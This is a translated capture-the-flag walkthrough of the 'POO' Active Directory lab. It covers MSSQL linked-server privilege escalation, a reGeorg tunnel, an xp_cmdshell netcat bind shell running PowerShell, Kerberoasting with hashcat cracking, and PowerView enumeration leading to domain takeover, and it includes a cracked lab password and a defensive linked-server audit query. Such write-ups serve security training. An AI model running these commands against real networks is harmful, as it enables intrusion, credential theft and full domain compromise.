In this article we walk through not just a single machine, but an entire mini-lab from the platform.
As stated in its description, POO is designed to test skills at every stage of an attack in a small Active Directory environment. The goal is to compromise an accessible host, escalate privileges, and ultimately take over the whole domain, collecting 5 flags along the way.
The lab is reached over VPN. It is recommended not to connect from a work computer or from a host holding important data, because you end up on a private network together with people who know a thing or two about information security :)
Organizational information
To help you keep up with new articles, software and other information, I created
All information is provided for educational purposes only. The author of this document accepts no responsibility for any damage caused to anyone as a result of using the knowledge and methods obtained from studying this document.
Intro
This endgame consists of two machines and has 5 flags.
A description and the address of the accessible host are provided.
Let's go!
Recon flag
This machine has the IP address 10.13.38.11, which I add to /etc/hosts.
10.13.38.11 poo.htb
First, we look at the open ports. Since scanning every port with nmap takes a long time, I do this first with masscan. We scan TCP and UDP ports from the tun0 interface at a rate of 500 packets per second.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Now, to get more detailed information about the services running on those ports, we run a scan with the -A option.
nmap -A poo.htb -p80,1433
So we have IIS and MSSQL services. In passing, we also learn the real DNS name of the domain and of the computer. On the web server we are greeted by the IIS default page.
Let's enumerate directories. I use gobuster for this. The parameters are the number of threads, 128 (-t), the URL (-u), the wordlist (-w) and the extensions we are interested in (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
This reveals HTTP authentication on the /admin directory, as well as an accessible .DS_Store file. .DS_Store files store custom settings for a folder, such as the list of files, icon positions, and the chosen background image. Such a file can end up in the web root when web developers copy their working directory to the server. From it we can recover the contents of the directory. For this you can use
python3 dsstore_crawler.py -i http://poo.htb/
We get the directory contents. The most interesting part here is the /dev directory, where we can look at the sources and db files in two branches. We can also make use of the first 6 characters of file and directory names if the server is vulnerable to IIS ShortName enumeration. You can check for this vulnerability with
And we find one text file whose name begins with "poo_co". Not knowing what to do next, I simply selected all words starting with "co" from the wordlist.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
And we go through them with wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
And we find the right word! Looking at this file, it contains credentials (judging by the DBNAME parameter, they are for MSSQL).
We hand in the flag and advance to 20%.
Huh flag
We connect to MSSQL; I use DBeaver.
We find nothing interesting in this database, so we open an SQL Editor and look at the logins.
SELECT name FROM master..syslogins;
We find two logins. Let's check our privileges.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
So, no privileges. Let's look at linked servers; I have written about this technique in detail
SELECT * FROM master..sysservers;
This is how we discover another SQL Server. Let's try executing queries on that server using openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
And we can build a chain of queries: the first linked server queries the second on our behalf.
SELECT version FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITY\POO_PUBLIC", ''select @@version as version'');');
The point is that when we query a linked server, the query is executed in the context of a different user! Let's see in which user's context we operate on the linked server.
SELECT name FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT user_name() as name');
Now let's see the context of a query that comes back from the linked server to our own!
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITY\POO_PUBLIC", ''SELECT user_name() as name'');');
So it runs as dbo, which should have full privileges. Let's check the server roles when the query arrives from the linked server.
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITY\POO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
As you can see, we have every privilege! So let's create our own admin login. openquery() will not let us do that, so we do it via EXECUTE ... AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
Now, connecting with the new login's credentials, we browse the databases and find a new flag.
We hand in this flag and move on.
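The weakness behind the two-hop trick above is a linked-server login mapping that hands every caller a fixed, highly privileged remote identity, with RPC Out enabled so that EXECUTE ... AT is accepted. The following audit query is an added example, not part of the original article or of the lab; it uses only the sys.servers, sys.linked_logins and sys.configurations catalog views and would be run by a DBA on each instance in the chain:

```sql
-- Added audit query: which linked servers expose a fixed remote identity?
-- A row with local_login = '<all logins>', uses_self_credential = 0 and a
-- privileged remote_name, together with is_rpc_out_enabled = 1, is the
-- misconfiguration that lets any low-privileged login run EXECUTE ... AT
-- as that remote account (the pattern used against POO_CONFIG/POO_PUBLIC).
SELECT  s.name                     AS linked_server,
        s.product,
        s.provider,
        s.is_data_access_enabled,  -- 1: OPENQUERY against this server works
        s.is_rpc_out_enabled,      -- 1: EXECUTE ... AT this server works
        CASE WHEN ll.local_principal_id = 0 THEN N'<all logins>'
             ELSE SUSER_NAME(ll.local_principal_id)
        END                        AS local_login,
        ll.uses_self_credential,   -- 1: caller is impersonated (preferable)
        ll.remote_name             -- fixed remote login when not impersonating
FROM    sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
       ON ll.server_id = s.server_id
WHERE   s.is_linked = 1
  AND   (ll.uses_self_credential = 0 OR ll.uses_self_credential IS NULL)
ORDER BY s.name, local_login;

-- Instance-wide switches the walkthrough also relies on; 0 is the safe value
-- unless a documented business need exists.
SELECT  name, value_in_use
FROM    sys.configurations
WHERE   name IN (N'xp_cmdshell',
                 N'external scripts enabled',
                 N'Ad Hoc Distributed Queries');
```

Remediation is to map linked-server logins with uses_self_credential = 1 (or to a remote login with only the rights the application needs) and to disable RPC Out where EXECUTE ... AT is not required.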
BackTrack flag
To get a shell through MSSQL, I use mssqlclient from the impacket suite.
mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC
We need to collect credentials, and the first thing we saw was a website. So we should look at the web server's configuration (we cannot get a proper shell; a firewall appears to be running).
But access is denied. Since we can read files from MSSQL, we need to find out which external script languages are configured. And in the MSSQL directory we see that Python is present.
Then reading the web.config file is no problem.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:\inetpub\wwwroot\web.config').read())"
With the credentials obtained, we go to /admin and take the flag.
Foothold flag
Indeed, the firewall causes some problems, but looking at the network settings we notice that IPv6 is also in use!
We add this address to /etc/hosts.
dead:babe::1001 poo6.htb
We scan the host again, this time over IPv6.
And over IPv6 we find the WinRM service. We connect with the credentials we already know.
The flag is on the desktop; we hand it in.
P00ned flag
After doing reconnaissance on the host with
setspn.exe -T intranet.poo -Q */*
we run the command via MSSQL.
Using this method we obtain the SPNs of the users p00_hr and p00_adm, which means they are exposed to an attack such as Kerberoasting. In short, we can obtain their password hashes.
First you need a full shell as the MSSQL service user. But our access is limited: we can talk to the host only over ports 80 and 1433. Traffic can, however, be tunneled over port 80! For this we will use
But when we try to access it, we get a 404 error. This means that *.aspx files are not being executed. To make files with this extension execute, ASP.NET 4.5 is installed as follows.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
And now, when we open tunnel.aspx, we get a response saying everything is ready to go.
We start the client side of the tool, which will forward the traffic. All traffic arriving on local port 5432 will be sent to the server.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
And we use proxychains to send an application's traffic through our proxy. Add this option to the /etc/proxychains.conf configuration file.
Now we upload the program to the server
and start the listener from MSSQL.
xp_cmdshell C:\temp\nc64.exe -e powershell.exe -lvp 4321
And we connect through our proxy.
proxychains rlwrap nc poo.htb 4321
And we collect the hashes.
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Then these hashes have to be cracked. Since the passwords are not in the rockyou wordlist, I used all the password wordlists shipped in Seclists. For cracking we use hashcat.
hashcat -a 0 -m 13100 kerb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
And we recover both passwords: the first from the dutch_passwordlist.txt wordlist, the second from Keyboard-Combinations.txt.
So now we have three users; let's head for the domain controller. First we find its address.
Great, we have the IP address of the domain controller. Let's find all domain users and which of them are administrators. To do this, download the PowerView.ps1 script. Then connect with evil-winrm, pointing the -s parameter at the directory containing the script. Then simply load the PowerView script.
Now all of its functions are available to us. The user p00_adm looks like a privileged user, so we will act in their context. Let's create a PSCredential object for this user.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Now any PowerShell command to which we pass Creds will run as p00_adm. Let's list the users together with their AdminCount attribute.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
And so our user is indeed privileged. Let's look at their groups.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
We have finally confirmed that the user is an administrator. This gives them the right to log on to the domain controller remotely. Let's try to get in over WinRM through our tunnel. I ran into errors produced by reGeorg when using evil-winrm.
So instead we use something simpler,
We try to connect, and we are in the system.
But there is no flag. So we check the users and look through their desktops.
We find the flag under mr3ks, and the lab is 100% complete.
That's all. As feedback, please say whether you learned something new from this article and whether it was useful to you.
You can join us at
Source: www.habr.com